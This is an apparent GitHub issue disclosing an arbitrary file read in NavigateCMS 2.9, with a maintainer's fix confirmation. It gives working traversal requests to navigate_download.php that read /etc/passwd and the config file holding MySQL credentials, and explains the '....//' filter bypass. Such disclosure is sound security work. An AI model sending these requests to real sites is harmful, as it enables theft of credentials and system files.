### ISSUE TITLE
arbitrary file read vulnerability in NavigateCMS 2.9

### ISSUE THREAD

**Issue by bkfish** [NavigateCMS/Navigate-CMS#28]
## exp
after login ,we can see our sid in cookies
![image](https://user-images.githubusercontent.com/38547290/143457734-1d546b85-11a5-4115-ae76-69927d953736.png)
for example my sid is 161099c65675803ecc8de95ae08d3e12
then you can get arbitrary file by
`/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd`
![image](https://user-images.githubusercontent.com/38547290/143458062-efc98047-0f7e-497a-ab33-ed28c133624e.png)
`/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php` you can get some Sensitive information such as mysql user/password 

## analysis
location:navigate_download.php
![image](https://user-images.githubusercontent.com/38547290/143457171-45600e42-9b42-4629-b58e-5e18f31fa002.png)
and in navigate\lib\core\core.php 
![image](https://user-images.githubusercontent.com/38547290/143457245-9a2a0162-b825-415e-abd3-420be677405f.png)
we can rewrite bypass this filter.

## suggest
you can  use replace('../', "hacker") rather than replace('../', "")

**Comment by NavigateCMS** [comment]
Fixed by fabb4718d7c6a4e0bdf02800d55d7de2cf492261

Thank you very much bkfish!
